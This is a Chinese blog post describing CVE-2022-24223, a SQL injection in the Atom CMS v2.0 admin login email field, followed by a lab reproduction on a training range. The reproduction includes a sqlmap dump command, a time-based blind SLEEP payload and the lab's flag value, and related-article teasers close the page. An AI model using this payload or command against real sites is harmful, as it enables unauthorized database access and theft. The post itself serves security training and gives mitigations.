Atom CMS v2.0 SQL 注入漏洞(CVE-2022-24223)

news2024/11/15 6:15:53

前言

概要 CVE-2022-24223 是一个发现于 Atom CMS v2.0 中的 SQL 注入漏洞。该漏洞存在于 /admin/login.php 文件中,通过该文件,攻击者可以在未经身份验证的情况下执行任意的 SQL 命令。

漏洞描述 该漏洞位于 Atom CMS 的管理员登录页面(/admin/login.php),其中电子邮件字段的用户输入未经过适当的过滤和清理便直接用于 SQL 查询。攻击者可以通过操纵登录表单中的输入字段来注入恶意的 SQL 代码,从而绕过身份验证,访问数据库中的敏感信息,甚至执行管理员操作而不需要合法凭证​ (OpenCVE)​​ (TrackCVE)​。

影响 成功利用该漏洞的攻击者可以:

  1. 绕过身份验证,访问 CMS 的管理功能。
  2. 获取数据库中的敏感信息,例如用户凭证和个人信息。
  3. 对整个 Web 应用程序进行控制,进一步发起针对网站用户或底层服务器基础设施的攻击​ (Feedly)​​ (Security For Everyone)​。

漏洞评分 根据 CVSS v3.1 标准,该漏洞的评分为 9.8(严重级别),在 CVSS v2 标准下评分为 7.5(高危级别)​ (TrackCVE)​。

防护措施 为了防止此类 SQL 注入攻击,建议开发者:

  1. 实施严格的输入验证和清理。
  2. 使用参数化查询来避免直接在 SQL 查询中使用用户输入的数据。
  3. 定期进行安全审计和漏洞扫描,以确保及时发现和修复潜在的安全问题。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。

漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。

教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。

竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。

资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Atom CMS v2.0

Atom CMS 是一个开源内容管理系统,专为简化网站建设和管理而设计。它具有以下主要特点:

主要特性

  1. 用户友好的界面

    • Atom CMS 提供一个直观的管理界面,使用户能够轻松地添加、编辑和管理网站内容。界面设计简洁,用户无需专业的技术知识即可上手。
  2. 模块化设计

    • 该 CMS 具有模块化的架构,允许用户根据需要安装和卸载不同的模块,从而扩展网站的功能。例如,可以添加新闻发布、博客、相册等模块。
  3. 模板系统

    • Atom CMS 支持自定义模板,使用户能够根据自己的需求设计和调整网站的外观和布局。模板系统灵活,支持各种前端框架和设计风格。
  4. 多用户管理

    • 系统允许多个用户同时管理网站,并且可以为不同的用户分配不同的角色和权限。这确保了网站的安全性和管理的便捷性。
  5. 内容版本控制

    • Atom CMS 具备内容版本控制功能,用户可以跟踪内容的修改历史,并在需要时恢复到以前的版本。这在内容管理和维护中非常有用。
  6. 多语言支持

    • 该 CMS 支持多语言功能,使用户能够创建和管理多语言网站,满足不同地区和语言用户的需求。
  7. 搜索引擎优化(SEO)

    • Atom CMS 提供了一系列内置的 SEO 工具,帮助用户优化网站在搜索引擎中的排名,提高网站的可见性和访问量。

应用场景

  • 企业网站:适合中小型企业创建企业网站,展示公司信息和服务。
  • 个人博客:个人用户可以使用 Atom CMS 创建和管理博客,分享个人观点和生活点滴。
  • 非营利组织网站:适合非营利组织创建信息门户,宣传组织的活动和项目。

社区和支持

Atom CMS 拥有一个活跃的开发者和用户社区,提供丰富的资源和支持。用户可以在论坛、邮件列表和社交媒体上找到帮助和建议。此外,官方还提供详细的文档和教程,帮助用户了解和使用系统的各项功能。

通过其强大的功能和灵活的设计,Atom CMS v2.0 是一个适用于各种网站建设需求的内容管理系统。用户可以根据自己的需求进行定制和扩展,轻松管理和维护网站内容。

漏洞复现

打开靶场

进入靶场是这样一个东西

这里不存在漏洞点,漏洞点在 admin/login.php 中

随便输入数值登录

打开 BurpSuite 拦截数据包

复制数据包的值到 txt 文件中

这里跳过了前面爆库爆表环节,直接找 flag 

┌──(root㉿kali)-[~]
└─# sqlmap -r sqlmap-post.txt -D "atomcms" -T "flag" --dump -v
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:50:24 /2024-07-03/

[20:50:24] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[20:50:24] [INFO] resuming back-end DBMS 'mysql' 
[20:50:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=123@123' AND (SELECT 1723 FROM (SELECT(SLEEP(5)))wLUx) AND 'BIkI'='BIkI&password=123
---
[20:50:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:50:24] [INFO] fetching columns for table 'flag' in database 'atomcms'
[20:50:24] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)     
[20:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1
[20:50:45] [INFO] retrieved: flag
[20:51:48] [INFO] fetching entries for table 'flag' in database 'atomcms'
[20:51:48] [INFO] fetching number of entries for table 'flag' in database 'atomcms'
[20:51:48] [INFO] retrieved: 1
[20:51:54] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{a5086810-1062-41c2-b1dd-b167d983a966}
Database: atomcms
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{a5086810-1062-41c2-b1dd-b167d983a966} |
+--------------------------------------------+

[21:03:49] [INFO] table 'atomcms.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zealxppdxmz7ojcz3y9.cloudeci1.ichunqiu.com/dump/atomcms/flag.csv'
[21:03:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zealxppdxmz7ojcz3y9.cloudeci1.ichunqiu.com'

[*] ending @ 21:03:49 /2024-07-03/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1908871.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

甄选范文“论区块链技术及应用”,软考高级论文,系统架构设计师论文

论文真题 区块链作为一种分布式记账技术,目前已经被应用到了资产管理、物联网、医疗管理、政务监管等多个领域。从网络层面来讲,区块链是一个对等网络(Peer to Peer, P2P),网络中的节点地位对等,每个节点都保存完整的账本数据,系统的运行不依赖中心化节点,因此避免了中…

跨境电商代购系统与电商平台API结合的化学反应

随着全球化的不断推进和互联网技术的飞速发展,跨境电商已成为国际贸易的重要组成部分。跨境电商代购系统作为连接国内外消费者与商品的桥梁,不仅为消费者提供了更多元化的购物选择,也为商家开辟了更广阔的市场空间。在这一过程中,…

数据结构——顺序表(java实现)

文章目录 顺序表顺序表的定义代码实现:创建一个顺序表的类在顺序表中增加一条新的数据展示顺序表中内容在pos位置处插入一条数据判断顺序表中是否包含指定的数据查找某个数据在顺序表中的位置获取pos位置的元素将pos位置的元素改为value删除顺序表中第一个出现的数据…

搭建基础库~

前言 项目中会用到工具库、函数库以及一些跟框架绑定的组件,如果这些基础模块每个项目都实现一套,维护起来那真的头大,你说呢😉 搭建流程 准备工作 创建文件夹myLib、安装Git以及pnpm 目录大概就系这样子: myLib ├…

从零开始做题:好怪哦

题目 给出一个压缩文件 解题 方法1 01Edit打开,发现是个反着的压缩包(末尾倒着的PK头) import os# 目标目录路径 # target_directory /home/ai001/alpaca-lora# 切换到目标目录 # os.chdir(target_directory)# 打印当前工作目录以确认…

# Redis 入门到精通(一)数据类型(1)

Redis 入门到精通(一)数据类型(1) 一 、Redis 入门到精通 基本介绍 1、Redis 基础 ( windows 环境 ) redis 入门数据类型通用命令Jedis 2、Redis 高级 ( linux 环境 ) 持久化redis.conf 配置事务集群 3、Redis 应用 ( linux…

WAIC | 2024年世界人工智能大会“数学与人工智能”学术会议成功举办!

由斯梅尔数学与计算研究院(Smale Institue of Mathematics & Computation)主办的2024年世界人工智能大会(WAIC)“数学与人工智能”学术会议7月4日在上海世博中心圆满落幕!作为全球性高级别学术研讨会,此次会议由华院计算技术&…

SQLServer的系统数据库用别的服务器上的系统数据库替换后做跨服务器连接时出现凭证、非对称金钥或私密金钥的资料无效

出错作业背景: 公司的某个sqlserver服务器要做迁移,由于该sqlserver服务器上数据库很多,并且做了很多的job和维护计划,重新安装的sqlserver这些都是空的,于是就想到了把系统4个系统数据库进行替换,然后也把…

Camera Raw:裁剪

Camera Raw 的裁剪 Crop面板提供了裁剪、旋转、翻转、拉直照片等功能,通过它们可以更精确地调整照片的视角和范围,以达到最佳二次构图的视觉效果。 快捷键:C ◆ ◆ ◆ 使用方法与技巧 1、使用预设 选择多种裁剪预设(如 1:1、16:…

JAVA基础-----128陷阱

一、何为128陷阱 Java中Integer类型在使用比较时的特殊行为------128陷阱,解释了当数值在-128到127范围内,由于valueOf方法的缓存机制导致地址相同,比较为真;超出这个范围则新分配内存,地址不同,比较为假。…

YOLOv10改进 | 主干篇 | 低照度增强网络PE-YOLO改进主干(改进暗光条件下的物体检测模型)

一、本文介绍 本文给大家带来的改进机制是低照度图像增强网络PE-YOLO中的PENet,PENet通过拉普拉斯金字塔将图像分解成多个分辨率的组件,增强图像细节和低频信息。它包括一个细节处理模块(DPM),用于通过上下文分支和边…

数据链路层(超详细)

引言 数据链路层是计算机网络协议栈中的第二层,位于物理层之上,负责在相邻节点之间的可靠数据传输。数据链路层使用的信道主要有两种类型:点对点信道和广播信道。点对点信道是指一对一的通信方式,而广播信道则是一对多的通信方式…

办公必备——ONLYOFFICE8.1版本桌面编辑器

一、介绍ONLYOFFICE ONLYOFFICE是一款免费的开源办公软件,它可以让你创建、编辑和分享文档、表格和演示文稿。就像微软的Office一样,但它是完全免费的,而且可以在多种设备上使用,包括电脑和手机。它还支持多人同时在线编辑文档&am…

Golang | Leetcode Golang题解之第223题矩形面积

题目: 题解: func computeArea(ax1, ay1, ax2, ay2, bx1, by1, bx2, by2 int) int {area1 : (ax2 - ax1) * (ay2 - ay1)area2 : (bx2 - bx1) * (by2 - by1)overlapWidth : min(ax2, bx2) - max(ax1, bx1)overlapHeight : min(ay2, by2) - max(ay1, by1)…

独立开发者系列(22)——API调试工具apifox的使用

接口的逻辑已经实现,需要对外发布接口,而发布接口的时候,我们需要能自己简单调试接口。当然,其实自己也可以写简单的代码调试自己的接口,因为其实就是简单的request请求或者curl库读取,调整请求方式get或者…

第11章 规划过程组(二)(11.10制订进度计划)

第11章 规划过程组(二)11.10制订进度计划,在第三版教材第395~397页;文字图片音频方式 第一个知识点:定义及作用 分析活动顺序、持续时间、资源需求和进度制约因素,创建项目进度模型,从而落实项目…

基于单片机的太阳能热水器控制系统设计

随着我国经济水平的不断提高,民众对生活质量的追求也在不断进步,对于现代家庭而言,热水器成为了必备的生活电器。目前市面上的电器主要是电热水器、燃气热水器以及太阳能热水器。就能源节约性能而言,太阳能热水器占据了绝对优势&a…

01day C++初入学习

这里写目录标题 1.C区别于C的输入输出2.什么是命名空间3. namespace的定义namespace的使用(1)namespace嵌套使用(2)多⽂件中可以定义同名namespace(3) 4.命名空间的使用5.C输⼊&输出6.缺省参数7.函数重载8.引用8.1引用的特性8.3引用的使用 1.C区别于C的输入输出 #include&…

接口调用的三种方式

例子: curl --location http://110.0.0.1:1024 \ --header Content-Type: application/json \ --data {"task_id": 1 }方式一:postman可视化图形调用 方式二:Vscode中powershell发送请求 #powershell (psh) Invoke-WebRequest -U…

探展2024世界人工智能大会之令人惊艳的扫描黑科技~

文章目录 ⭐️ 前言⭐️ AIGC古籍修复文化遗产焕新⭐️ 高效的文档图像处理解决方案⭐️ AIGC扫描黑科技一键全搞定⭐️ 行业级的知识库大模型加速器⭐️ 结语 ⭐️ 前言 大家好,我是 哈哥(哈哥撩编程),这次非常荣幸受邀作为专业…